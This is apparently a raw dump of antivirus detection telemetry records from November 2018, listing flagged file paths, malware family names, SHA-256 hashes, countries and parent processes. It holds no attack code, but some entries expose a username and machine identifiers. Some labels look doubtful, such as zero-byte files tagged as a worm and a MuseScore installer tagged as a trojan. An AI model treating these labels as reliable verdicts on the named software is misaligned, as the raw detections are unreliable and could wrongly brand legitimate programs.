  Row(detection=Row(filename='z2w1.exe', filepath='C:\\ProgramData\\EXstRaCeooupon\\Z2W1.exe', filesize=704000, name='ADWARE/MultiPlug.Gen.#M300.#R6864'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\PC Faster\\5.1.0.0\\Cloud Security\\BCloudScan.exe', parentsize=2265456, timestamp='2018-11-02T03:51:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~sed7f9.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~seD7F9.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='c9833fa6f2ad06b37fe305c27eda5ab434ed9ddca2819dca59e7c74dc284c6e1', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tydpaclt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\TyDpaclt.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162102-dccd488d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24e655c8\\AVSCAN-20181102-162044-D899213A\\AVSCAN-20181102-162102-DCCD488D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='musescore-1.3.exe', filepath='D:\\Software\\MuseScore-1.3.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3351'), hash='ea77d6efc563c611e94b41ef18093a8d297573d20240b0a1906beef186f4b282', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T11:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdhrv.exe', filepath='c:\\users\\X\\appdata\\roaming\\fvdhrv.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T13:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='recoverytoolbox.exe', filepath='\\\\?\\C:\\Windows\\other\\Test 工具區\\RecoveryToolbox.exe', filesize=44864000, name='TR/AVKiller.twazw.#M1.#R1'), hash='b36c48f3568b5b6b37bde33c5c911e82b52c8d5f47e9b41b1203185711ae112e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{AF0AEBDC-1900-49B1-AEC7-7DC465295B24} S-1-5-21-887274040-931539383-1001559527-1000:mahdi-PC\\\\mahdi:Interactive:LUA[1]', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:22:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:55:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085926-27d420e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234137-7F763213\\AVSCAN-20181102-085926-27D420E3', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:51:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='typeperf.exe', filepath='\\?\\H:\\WINDOWS\\system32\\typeperf.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8ab0dd7a29c6fa0b1d3ad136649a25294faaf0277fc72cbcf63572b84002a0bd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.4\\GT-D V6.4\\GT-D V6.4\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='d3bb886216164462e9342624ca0808393fe479fea50399f79ea8feac992bebad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082935-a8f62a5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082935-A8F62A5E', filesize=64000, name='TR/Agent.gpono.#M1.#R1'), hash='a226c44141c53061f71957bc34dbfface47bd10230578a172e45e5b267b295b6', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2rkawlfdyif\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9c636a10e4ff6377bce3ab9c5fa120a138d4a4201de5d3e323f650b1a2029226', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-26\\9C636A10E4FF6377BCE3AB9C5FA120A138D4A4201DE5D3E323F650B1A2029226', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9c636a10e4ff6377bce3ab9c5fa120a138d4a4201de5d3e323f650b1a2029226', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-26.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-24.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-25.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='anims.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMMON\\ANIMS\\ANIMS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='928ff71a795c02629c8ae50f06db366f3c19969ff50708ea4316dd1ec29c00cc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinnacle.exe', filepath='G:\\Pinnacle\\Pinnacle.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='689342.exe', filepath='\\\\?\\D:\\689342.exe', filesize=64000, name='TR/Patched.Ren.Gen.#M300.#R4205'), hash='ed139557bf929c41df2cdcbf76798223f60d07b15816ab7cada3787008faf3cc', metadata=Row(cmdline=None, country='MK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\000 Kayu Lapis Indonesia\\Software\\instaler\\(D) CD v3_1VI\\Lan\\RealTek\\Setup.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='c53def0da5663ee6911a7a6c16bee144e5691a383f497076593b43727a778697', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T01:53:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:51:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023e140', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e140', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='edital intimação levant. de penhora.doc', filepath='E:\\arquivos do cartório\\MEUS DOCUMENTOS\\EDITAL INTIMAÇÃO LEVANT. DE PENHORA.doc', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='d2dfaf5e1e361b7342648856ed044041922531acda1b0dd969527582742d3b6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T20:05:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl18a.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl18A.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239554', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239554', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fcf23f5f3c19c921e4d3b9edc90943ee331a5eac991d149e877b105195f84da4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='199c47b65c3579cca02d5a3f58ad1e9dadd78e34', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\199c47b65c3579cca02d5a3f58ad1e9dadd78e34', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='b9429a4af10ef11cfcc2ded9274125025bc3931cfe12c5985435f3d35745d242', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:31:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029024c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029024c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:28:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ab06', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ab06', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:03:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c613', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c613', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:33:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133202-93f6b43f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-133202-93F6B43F', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151948-2a22787e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e72198a\\AVSCAN-20181104-151924-26C2E497\\AVSCAN-20181104-151948-2A22787E', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f13ee27b9455ab2f71cff6299132cd833f0024e14d5a023a9f3ec4d815deb64a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F13EE27B9455AB2F71CFF6299132CD833F0024E14D5A023A9F3EC4D815DEB64A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f13ee27b9455ab2f71cff6299132cd833f0024e14d5a023a9f3ec4d815deb64a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:21:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FA213CDE1532BA7160B21CC7598F6986416D51A307BA632107F7CA282B0ACC5D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa213cde1532ba7160b21cc7598f6986416d51a307ba632107f7ca282b0acc5d', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:02:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002525cc', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp002525cc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252a14', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252a14', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-100709-b45b76bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e417d959\\AVSCAN-20181101-100648-B0C31FE5\\AVSCAN-20181101-100709-B45B76BD', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:37:00Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='iddbas32.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Common Files\\Borland Shared\\BDE\\iddbas32.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='0815476a461c413fa908b96aa5c2821aeb7b3a2abce3f4f5b118bbe6c514f1d5', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:03:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='launcher.dll', filepath='C:\\Program Files (x86)\\Steam\\SteamApps\\common\\Counter-Strike Global Offensive\\bin\\launcher.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='0ac4b0f50093a60f4d91af9def8c52e84384940b687730b5575abb9f6f143dbe', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T17:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='261a2382fa82e428efc26f72c5a59cbbb78e34b82b0156611d28b6066a424608', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe358_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe358 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T12:43:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183638-005678dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8518b6c\\AVSCAN-20181102-183627-FE9162CF\\AVSCAN-20181102-183638-005678DC', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='droplet template.exe', filepath='C:\\Program Files\\Adobe\\Adobe Photoshop CS2\\Required\\Droplet Template.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='0b04977e527ef87bf35911463cf918654ac138a82ceab2aa497f64816c8eac09', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:zaQyKqDA70uNGHBy.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126096, timestamp='2018-11-02T02:46:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163003-34ddf425', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_745243a5\\AVSCAN-20181102-162207-F543B52C\\AVSCAN-20181102-163003-34DDF425', filesize=2048000, name='TR/Agent.39b6f0.#M1.#R1'), hash='39b6f02a1df8b0bba2337518dece3d290ff797c9ee759ccf88bdd097b0b1e9b0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\2.vbs\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T05:38:35Z'), dt=datetime.date(2018, 11, 2)),
